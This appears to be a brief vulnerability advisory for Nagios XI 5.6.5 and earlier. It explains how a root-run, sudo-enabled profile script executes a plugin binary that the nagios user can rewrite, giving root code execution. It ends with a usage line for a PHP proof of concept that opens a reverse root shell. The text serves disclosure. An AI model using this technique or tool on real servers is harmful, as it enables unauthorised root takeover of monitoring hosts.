A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to escalate privileges to root.
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with perissions to manage plugins.
getprofile.sh script, invoked by downloading a system profile (profile.php?cmd=download), is executed as root via a passwordless sudo entry; the script executes the ‘check_plugin’ executuable which is owned by the nagios user.
A user logged into Nagios XI with permissions to modify plugins, or the 'nagios' user on the server, can modify the ‘check_plugin’ executable and insert malicious commands exectuable as root.
A PHP POC has been developed which uploads a payload resulting in a reverse root shell.
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port